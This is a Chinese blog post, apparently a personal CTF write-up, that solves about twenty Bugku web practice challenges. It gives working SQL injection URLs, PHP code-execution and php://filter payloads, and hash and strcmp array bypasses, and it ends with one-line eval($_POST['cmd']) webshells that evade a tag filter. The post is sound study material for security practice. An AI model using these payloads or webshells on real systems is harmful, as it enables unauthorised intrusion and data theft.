<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />





  <link rel="alternate" href="/atom.xml" title="Kage's Blog" type="application/atom+xml" />






<meta name="description" content="1.web2直接右键查看元素就能看到flag主要还是要养成看源码的习惯 2.文件上传测试上传php说非图片文件,上传图片说非php文件,应该是一个上传绕过，通过burpsuit抓包改文件名后缀轻松绕过。 3.计算器谷歌浏览器F12修改样式，轻松绕过用户是可以通过浏览器修改前端代码的，所以类似通过js或者html的过滤限">
<meta property="og:type" content="article">
<meta property="og:title" content="bugku个人笔记">
<meta property="og:url" content="http://yoursite.com/2018/04/23/bugku个人笔记/index.html">
<meta property="og:site_name" content="Kage&#39;s Blog">
<meta property="og:description" content="1.web2直接右键查看元素就能看到flag主要还是要养成看源码的习惯 2.文件上传测试上传php说非图片文件,上传图片说非php文件,应该是一个上传绕过，通过burpsuit抓包改文件名后缀轻松绕过。 3.计算器谷歌浏览器F12修改样式，轻松绕过用户是可以通过浏览器修改前端代码的，所以类似通过js或者html的过滤限制是可以用同样方法绕过 4.矛盾简单的numeric绕过，输入num=1*0轻松">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/img/3261.jpg">
<meta property="og:image" content="http://yoursite.com/img/3262.png">
<meta property="og:image" content="http://yoursite.com/img/3263.png">
<meta property="og:image" content="http://yoursite.com/img/3271.png">
<meta property="og:image" content="http://yoursite.com/img/3272.png">
<meta property="og:image" content="http://yoursite.com/img/3273.png">
<meta property="og:image" content="http://yoursite.com/img/3274.png">
<meta property="og:image" content="http://yoursite.com/img/3275.png">
<meta property="og:image" content="http://yoursite.com/img/3277.png">
<meta property="og:image" content="http://yoursite.com/img/3278.png">
<meta property="og:image" content="http://yoursite.com/img/3279.png">
<meta property="og:image" content="http://yoursite.com/img/32711.png">
<meta property="og:image" content="http://yoursite.com/img/32712.png">
<meta property="og:image" content="http://yoursite.com/img/32713.png">
<meta property="og:image" content="http://yoursite.com/img/32714.png">
<meta property="og:image" content="http://yoursite.com/img/32715.png">
<meta property="og:image" content="http://yoursite.com/img/32716.png">
<meta property="og:image" content="http://yoursite.com/img/32718.png">
<meta property="og:image" content="http://yoursite.com/img/32719.png">
<meta property="og:image" content="http://yoursite.com/img/32720.png">
<meta property="og:image" content="http://yoursite.com/img/32721.png">
<meta property="og:image" content="http://yoursite.com/img/32722.png">
<meta property="og:updated_time" content="2018-04-23T11:25:11.080Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="bugku个人笔记">
<meta name="twitter:description" content="1.web2直接右键查看元素就能看到flag主要还是要养成看源码的习惯 2.文件上传测试上传php说非图片文件,上传图片说非php文件,应该是一个上传绕过，通过burpsuit抓包改文件名后缀轻松绕过。 3.计算器谷歌浏览器F12修改样式，轻松绕过用户是可以通过浏览器修改前端代码的，所以类似通过js或者html的过滤限制是可以用同样方法绕过 4.矛盾简单的numeric绕过，输入num=1*0轻松">
<meta name="twitter:image" content="http://yoursite.com/img/3261.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/04/23/bugku个人笔记/"/>





  <title>bugku个人笔记 | Kage's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <a href="https://your-url" class="github-corner" aria-label="View source on Github"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Kage's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Kage's Blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/04/23/bugku个人笔记/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Kage">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/touxiang.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Kage's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">bugku个人笔记</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-04-23T19:25:52+08:00">
                2018-04-23
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="1-web2"><a href="#1-web2" class="headerlink" title="1.web2"></a>1.web2</h3><p>直接右键查看元素就能看到flag<br><br>主要还是要养成看源码的习惯<br><img src="/img/3261.jpg" alt=""></p>
<h3 id="2-文件上传测试"><a href="#2-文件上传测试" class="headerlink" title="2.文件上传测试"></a>2.文件上传测试</h3><p>上传php说非图片文件,上传图片说非php文件,应该是一个上传绕过，通过burpsuit抓包改文件名后缀轻松绕过。<br><br><img src="/img/3262.png" alt=""></p>
<h3 id="3-计算器"><a href="#3-计算器" class="headerlink" title="3.计算器"></a>3.计算器</h3><p>谷歌浏览器F12修改样式，轻松绕过<br><br>用户是可以通过浏览器修改前端代码的，所以类似通过js或者html的过滤限制是可以用同样方法绕过<br><img src="/img/3263.png" alt=""></p>
<h3 id="4-矛盾"><a href="#4-矛盾" class="headerlink" title="4.矛盾"></a>4.矛盾</h3><p>简单的numeric绕过，输入num=1*0轻松绕过<br></p>
<ol>
<li>is_numeric(“1*0”) false</li>
<li>is_numeric(“1x0”) false</li>
<li>is_numeric(1*0) true</li>
<li>is_numeric(0x1) true</li>
<li>is_numeric(“0x1”) true</li>
<li>is_numeric(0e1231) true</li>
</ol>
<h3 id="5-WEB3"><a href="#5-WEB3" class="headerlink" title="5.WEB3"></a>5.WEB3</h3><p>查看源码看到这一串<img src="/img/3271.png" alt=""><br><br>进行html解码得到flag：KEY{J2sa42ahJK-HS11III}</p>
<h3 id="6-SQL测试"><a href="#6-SQL测试" class="headerlink" title="6.SQL测试"></a>6.SQL测试</h3><p>查看源码看到这一段<br><br><img src="/img/3272.png" alt=""><br><br>可以考虑宽字节注入，用%bf吃掉%5c，ok，果然报错</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://103.238.227.13:10083/?id=1%bf&apos;</span><br></pre></td></tr></table></figure>
<p>其他and 1=1 ，测字段老套路了，下面报数据库名<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://103.238.227.13:10083/?id=-1%bf&apos; union select schema_name,2 from information_schema.schemata--+</span><br></pre></td></tr></table></figure></p>
<p>报表名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://103.238.227.13:10083/?id=-1%bf&apos; union select table_name,2 from information_schema.tables where table_schema=database()--+</span><br></pre></td></tr></table></figure>
<p>报列名，这里一开始表名我是尝试’key’,结果被转义，所以可以用16进制绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://103.238.227.13:10083/?id=-1%bf&apos; union select column_name,2 from information_schema.columns where table_name=0x6b6579--+</span><br></pre></td></tr></table></figure>
<p>最后报数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://103.238.227.13:10083/?id=-1%bf&apos; union select string,2 from sql5.key --+</span><br></pre></td></tr></table></figure>
<h3 id="7-域名解析"><a href="#7-域名解析" class="headerlink" title="7.域名解析"></a>7.域名解析</h3><p>进入kali，vi更改/etc/hosts文件，增加如下内容<br><br>120.24.86.145 flag.bugku.com<br><br><img src="/img/3273.png" alt=""><br><br>访问flag.bugku.com 得到flag<br><br><img src="/img/3274.png" alt=""><br></p>
<h3 id="8-SQL注入1"><a href="#8-SQL注入1" class="headerlink" title="8.SQL注入1"></a>8.SQL注入1</h3><p>关键函数strip_tags($id)：从字符串中去除 HTML 和 PHP 标记，<br>所以可以在过滤的字段中加&lt;&gt;，也可以%00截断。<br><br><br>1=1，1=2分析出后台sql语句<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://103.238.227.13:10087/?id=1 an%00d 1=2 #</span><br></pre></td></tr></table></figure></p>
<p>其他类似上面的，直接报数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://103.238.227.13:10087/?id=-1 uni%00on sel%00ect 1,hash fro%00m sql3.key --+</span><br></pre></td></tr></table></figure>
<h3 id="9-你必须让他停下来"><a href="#9-你必须让他停下来" class="headerlink" title="9.你必须让他停下来"></a>9.你必须让他停下来</h3><p>放到burpsuit重放，go几次就出flag了<br><img src="/img/3275.png" alt=""><br></p>
<h3 id="10-本地包含"><a href="#10-本地包含" class="headerlink" title="10.本地包含"></a>10.本地包含</h3><p>看题目一开始以为是文件包含，进去以后包含了几个文件无果，代码审计一波看到关键函数eval( “var_dump($a);”); 典型的php代码执行漏洞。<br><br><br>下面各种获取源码姿势<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;1&gt;hell=);show_source(&quot;flag.php&quot;);//</span><br><span class="line">&lt;2&gt;hello=file(&quot;flag.php&quot;)</span><br><span class="line">&lt;3&gt;hello=);include(&quot;php://filter/convert.base64-encode/resource=flag.php&quot;</span><br><span class="line">&lt;4&gt;hello=);print_r(file(&quot;flag.php&quot;)</span><br><span class="line">&lt;5&gt;hello=);include(@$_POST[&apos;b&apos;]</span><br><span class="line">    在POST区域：b=php://filter/convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure></p>
<h3 id="11-变量1"><a href="#11-变量1" class="headerlink" title="11.变量1"></a>11.变量1</h3><p>又是一道php代码执行，关注这句代码<br><br>eval(“var_dump($$args);”);<br><br>用户所能控制的只有变量名，直接输入GLOBALS爆出所有全局变量。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://120.24.86.145:8004/index1.php?args=GLOBALS</span><br></pre></td></tr></table></figure>
<h3 id="12-web5"><a href="#12-web5" class="headerlink" title="12.web5"></a>12.web5</h3><p>右键查看源码看到一堆括号，我也不知道是什么东西，网上查是JSPFUCK，F12，扔进控制器执行得到flag<br><img src="/img/3277.png" alt=""><br></p>
<h3 id="13-头等舱"><a href="#13-头等舱" class="headerlink" title="13.头等舱"></a>13.头等舱</h3><p>抓响应包直接给我们flag了…<br><br><img src="/img/3278.png" alt=""><br></p>
<h3 id="14-flag在index里"><a href="#14-flag在index里" class="headerlink" title="14.flag在index里"></a>14.flag在index里</h3><p>click进去，看url<br><br><img src="/img/3279.png" alt=""><br><br><br>应该是文件包含漏洞，那flag在哪里呢<br>试试包含test5、flag.php无果<br>php://input试试，返回Oh no！<br>最后试试php流filter，成功!</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php://filter/convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure>
<p>得到base64的源码，去burp解码一下就得到flag啦。<br><img src="/img/32711.png" alt=""><br></p>
<h3 id="15-请输入密码查看flag"><a href="#15-请输入密码查看flag" class="headerlink" title="15.请输入密码查看flag"></a>15.请输入密码查看flag</h3><p>请输入5位数字密码查看，那还用说，直接burp爆破<br><br><img src="/img/32712.png" alt=""><br></p>
<h3 id="16-点击一百万次"><a href="#16-点击一百万次" class="headerlink" title="16.点击一百万次"></a>16.点击一百万次</h3><p>这题应该是有两个地方有检查，<br>一个是前端的js检查，要大于一百万才能发出请求的数据包。</p>
<p>因此我们把clicks改为1，这样点一下就能玩一年啦。<br><img src="/img/32713.png" alt=""><br><br>OK，包发出去了，但是服务器没有给我们返回flag，那么应该后端也有检查，burp抓包修改click值，成功！<br><img src="/img/32714.png" alt=""><br><br>得到flag<br><img src="/img/32715.png" alt=""><br></p>
<h3 id="17-备份是个好习惯"><a href="#17-备份是个好习惯" class="headerlink" title="17.备份是个好习惯"></a>17.备份是个好习惯</h3><p>尝试访问index.php.bak，成功下载文件下来<br><img src="/img/32716.png" alt=""><br><br>运用了两次md5，所以需要构造一下绕过。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://120.24.86.145:8002/web16/?kekeyy1[]=1&amp;kekeyy2[]=2</span><br></pre></td></tr></table></figure>
<h3 id="18-成绩单"><a href="#18-成绩单" class="headerlink" title="18.成绩单"></a>18.成绩单</h3><p>基于post的union类的sql注入<br>，其他老套路。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://120.24.86.145:8002/chengjidan/index.php</span><br><span class="line">post：id=-1&apos; union select 1,2,3,skctf_flag from fl4g#</span><br></pre></td></tr></table></figure>
<h3 id="19-never-give-up"><a href="#19-never-give-up" class="headerlink" title="19.never give up"></a>19.never give up</h3><p>右键源代码，看到1p.html<br><br>直接访问<a href="http://120.24.86.145:8006/test/1p.html，老是跳转到bugku官网，无果" target="_blank" rel="noopener">http://120.24.86.145:8006/test/1p.html，老是跳转到bugku官网，无果</a><br><br>试试直接查看源代码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">view-source:http://120.24.86.145:8006/test/1p.html</span><br></pre></td></tr></table></figure></p>
<p>得到一串编码过的数据<br><br><img src="/img/32718.png" alt=""><br>经分析，通过url解码，再base64解码，最后还要url解码得到源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">if(!$_GET[&apos;id&apos;])</span><br><span class="line">&#123;</span><br><span class="line">	header(&apos;Location: hello.php?id=1&apos;);</span><br><span class="line">	exit();</span><br><span class="line">&#125;</span><br><span class="line">$id=$_GET[&apos;id&apos;];</span><br><span class="line">$a=$_GET[&apos;a&apos;];</span><br><span class="line">$b=$_GET[&apos;b&apos;];</span><br><span class="line">if(stripos($a,&apos;.&apos;))</span><br><span class="line">&#123;</span><br><span class="line">	echo &apos;no no no no no no no&apos;;</span><br><span class="line">	return ;</span><br><span class="line">&#125;</span><br><span class="line">$data = @file_get_contents($a,&apos;r&apos;);</span><br><span class="line">if($data==&quot;bugku is a nice plateform!&quot; and $id==0 and strlen($b)&gt;5 and eregi(&quot;111&quot;.substr($b,0,1),&quot;1114&quot;) and substr($b,0,1)!=4)</span><br><span class="line">&#123;</span><br><span class="line">	require(&quot;f4l2a3g.txt&quot;);</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">	print &quot;never never never give up !!!&quot;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>然后有个猥琐解法直接访问f4l2a3g.txt就能得到flag了<br><br>耿直解法：<br></p>
<ul>
<li>$data==”bugku is a nice plateform!”：可以令a=php://input，然后POST传值 bugku is a nice plateform! 绕过。</li>
<li>strlen($b)&gt;5 and eregi(“111”.substr($b,0,1),”1114”) and substr($b,0,1)!=4：可以利用%00截断，令b=%0012345 绕过。</li>
<li>!$_GET[‘id’]并且id==0：令id=%00或者令id=.都可以绕过。 </li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://120.24.86.145:8006/test/hello.php?a=php://input&amp;b=%0012345&amp;id=.</span><br><span class="line">post:bugku is a nice plateform!</span><br></pre></td></tr></table></figure>
<p>典型的找源码，解密，代码审计题目</p>
<h3 id="20-前女友"><a href="#20-前女友" class="headerlink" title="20.前女友"></a>20.前女友</h3><p>查看源代码,<br><img src="/img/32719.png" alt=""><br>有个链接，点击得到源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">if(isset($_GET[&apos;v1&apos;]) &amp;&amp; isset($_GET[&apos;v2&apos;]) &amp;&amp; isset($_GET[&apos;v3&apos;]))&#123;</span><br><span class="line">    $v1 = $_GET[&apos;v1&apos;];</span><br><span class="line">    $v2 = $_GET[&apos;v2&apos;];</span><br><span class="line">    $v3 = $_GET[&apos;v3&apos;];</span><br><span class="line">    if($v1 != $v2 &amp;&amp; md5($v1) == md5($v2))&#123;</span><br><span class="line">        if(!strcmp($v3, $flag))&#123;</span><br><span class="line">            echo $flag;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>md5可以通过数组绕过，strcmp也可以通过数组绕过，构造得到flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://118.89.219.210:49162/?v1[]=1&amp;v2[]=2&amp;v3[]=1</span><br></pre></td></tr></table></figure>
<h3 id="21-各种绕过"><a href="#21-各种绕过" class="headerlink" title="21.各种绕过"></a>21.各种绕过</h3><p>进去看到一串源码<br></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(&apos;flag.php&apos;);</span><br><span class="line">$_GET[&apos;id&apos;] = urldecode($_GET[&apos;id&apos;]);</span><br><span class="line">$flag = &apos;flag&#123;xxxxxxxxxxxxxxxxxx&#125;&apos;;</span><br><span class="line">if (isset($_GET[&apos;uname&apos;]) and isset($_POST[&apos;passwd&apos;])) &#123;</span><br><span class="line">    if ($_GET[&apos;uname&apos;] == $_POST[&apos;passwd&apos;])</span><br><span class="line"></span><br><span class="line">        print &apos;passwd can not be uname.&apos;;</span><br><span class="line"></span><br><span class="line">    else if (sha1($_GET[&apos;uname&apos;]) === sha1($_POST[&apos;passwd&apos;])&amp;($_GET[&apos;id&apos;]==&apos;margin&apos;))</span><br><span class="line"></span><br><span class="line">        die(&apos;Flag: &apos;.$flag);</span><br><span class="line"></span><br><span class="line">    else</span><br><span class="line"></span><br><span class="line">        print &apos;sorry!&apos;;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>主要是绕过sha1函数，类似md5绕过，提交数组上去就行了。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://120.24.86.145:8002/web7/?uname[]=1&amp;id=margin</span><br><span class="line">post:passwd[]=2</span><br></pre></td></tr></table></figure></p>
<h3 id="文件包含2"><a href="#文件包含2" class="headerlink" title="文件包含2"></a>文件包含2</h3><p>查看源码，看到<img src="/img/32720.png" alt=""><br>果断包含upload.php,看到上传文件的界面<br><br><img src="/img/32721.png" alt=""><br><br>构造小马，发现过滤了&lt;?php ?&gt;<br><br>可以这样绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;?=@eval($_POST[&apos;cmd&apos;]);</span><br><span class="line">&lt;script language=&quot;php&quot;&gt;eval($_POST[&apos;cmd&apos;]);&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>然后执行<br><br><img src="/img/32722.png" alt=""><br>最后包含flag文件</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/04/07/PHP核心配置/" rel="next" title="PHP核心配置">
                <i class="fa fa-chevron-left"></i> PHP核心配置
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/touxiang.jpg"
                alt="Kage" />
            
              <p class="site-author-name" itemprop="name">Kage</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-web2"><span class="nav-number">1.</span> <span class="nav-text">1.web2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-文件上传测试"><span class="nav-number">2.</span> <span class="nav-text">2.文件上传测试</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-计算器"><span class="nav-number">3.</span> <span class="nav-text">3.计算器</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-矛盾"><span class="nav-number">4.</span> <span class="nav-text">4.矛盾</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-WEB3"><span class="nav-number">5.</span> <span class="nav-text">5.WEB3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-SQL测试"><span class="nav-number">6.</span> <span class="nav-text">6.SQL测试</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-域名解析"><span class="nav-number">7.</span> <span class="nav-text">7.域名解析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-SQL注入1"><span class="nav-number">8.</span> <span class="nav-text">8.SQL注入1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#9-你必须让他停下来"><span class="nav-number">9.</span> <span class="nav-text">9.你必须让他停下来</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#10-本地包含"><span class="nav-number">10.</span> <span class="nav-text">10.本地包含</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#11-变量1"><span class="nav-number">11.</span> <span class="nav-text">11.变量1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#12-web5"><span class="nav-number">12.</span> <span class="nav-text">12.web5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#13-头等舱"><span class="nav-number">13.</span> <span class="nav-text">13.头等舱</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#14-flag在index里"><span class="nav-number">14.</span> <span class="nav-text">14.flag在index里</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#15-请输入密码查看flag"><span class="nav-number">15.</span> <span class="nav-text">15.请输入密码查看flag</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#16-点击一百万次"><span class="nav-number">16.</span> <span class="nav-text">16.点击一百万次</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#17-备份是个好习惯"><span class="nav-number">17.</span> <span 